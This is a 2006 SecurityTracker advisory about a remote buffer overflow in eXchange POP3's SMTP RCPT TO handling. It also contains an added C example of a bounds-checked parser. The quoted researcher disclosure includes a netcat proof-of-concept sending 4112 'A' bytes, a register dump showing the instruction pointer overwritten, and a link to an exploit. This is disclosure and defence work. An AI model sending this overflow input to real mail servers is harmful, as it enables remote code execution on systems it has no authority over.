SecurityTracker.com

Category:   Application (E-mail Server)  >   eXchange POP3
Vendors:   Kinesphere Corporation
eXchange POP3 Server Buffer Overflow in SMTP RCPT TO Command Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015580
SecurityTracker URL:  http://securitytracker.com/id/1015580
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 3 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 5.0 (build 050203)
Description:   securma massine from MorX Security Research Team reported a vulnerability in eXchange POP3. A remote user can execute arbitrary code on the target system.

A remote user can connect to the target SMTP service and send a specially crafted SMTP RCPT TO command parameter to trigger a buffer overflow. This can be exploited to execute arbitrary code on the target system.

A demonstration exploit command is provided:

rcpt to:<AAAAAA....("A"x4112)

The vendor was notified on January 16, 2006.

A demonstration exploit is available at:

http://www.morx.org/expl5.txt

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (5.0 build 060125), available at:

http://www.exchangepop3.com/

Vendor URL:  www.exchangepop3.com/
Cause:   Boundary error
Underlying OS:  Windows (Any)
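
A bounds-checked RCPT TO parser, as an added example (not the vendor's code and not part of the original advisory): it enforces the RFC 5321 limits of 512 octets per command line and 256 octets per path before copying anything into a fixed-size buffer. The function name parse_rcpt_to and its reply-code convention are assumptions made for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* RFC 5321 section 4.5.3.1 size limits, in octets. */
#define SMTP_LINE_MAX 512 /* one command line, CRLF included */
#define SMTP_PATH_MAX 256 /* forward-path, angle brackets included */

/*
 * parse_rcpt_to() is a hypothetical helper, not the vendor's code.
 * line/len: one received command line (need not be NUL-terminated).
 * out/outsz: caller buffer for the mailbox without the angle brackets.
 * Returns the SMTP reply code to send: 250 accepted, 500 line too long,
 * 501 syntax error or path too long. Unless 250 is returned, out is "".
 * Parameters after '>' (ESMTP extensions) are ignored here.
 */
int parse_rcpt_to(const char *line, size_t len, char *out, size_t outsz)
{
    static const char verb[] = "RCPT TO:";
    const size_t vlen = sizeof verb - 1;
    const char *p, *end, *close;
    size_t i, plen;

    if (out == NULL || outsz == 0)
        return 501;
    out[0] = '\0';
    if (line == NULL || len > SMTP_LINE_MAX)
        return 500;                      /* reject before any parsing */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                           /* strip the line terminator */
    if (len < vlen)
        return 501;
    for (i = 0; i < vlen; i++)           /* SMTP verbs are case-insensitive */
        if (toupper((unsigned char)line[i]) != verb[i])
            return 501;
    p = line + vlen;
    end = line + len;
    if (p == end || *p != '<')
        return 501;
    close = memchr(p, '>', (size_t)(end - p));
    if (close == NULL)
        return 501;                      /* no closing bracket */
    plen = (size_t)(close - p) + 1;      /* path length with brackets */
    if (plen <= 2 || plen > SMTP_PATH_MAX || plen - 2 >= outsz)
        return 501;                      /* never truncate or overrun out */
    memcpy(out, p + 1, plen - 2);
    out[plen - 2] = '\0';
    return 250;
}
```

Rejecting on length before parsing means an over-long line is answered with a 500 reply and never reaches the copy.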

Message History:   None.


 Source Message Contents

Subject:  Exchangepop3 v5 rcpt buffer overflow vulnerability


Author: securma massine <securma@morx.org>
MorX Security Research Team
http://www.morx.org
 
Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from Internet POP3 
email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to buffer overflow attack.
boundary errors in the handling of the RCPT TO (smtp) commands by sending a large 
buffer, allow remote users to set a new Instruction Pointer to execute arbitrary code 
and gain access on system.
 
C:\>nc 127.0.0.1 25
220 aaa ESMTP
mail  [enter]
250 OK
rcpt to:<AAAAAA....("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38 edi=0f010001
eip=41414141 esp=0221f750 ebp=00000001 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ??               ???
 
Affected Software(s):
Exchangepop3 v 5.0 (build 050203)
 
Affected platform(s):
Windows
 
Exploit/Proof of Concept:
http://www.morx.org/expl5.txt
 
Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
http://www.exchangepop3.com/
 
History:
14/01/2006  initial vendor contact
16/01/2006  vendor received details about the vulnerability
02/02/2006  vendor released the fixed build
 
Disclaimer:
this entire document is for educational, testing and demonstrating purpose only.
 
Greets:
Greets to undisputed and  all MorX members.
 

 
 
 


Copyright 2019, SecurityGlobal.net LLC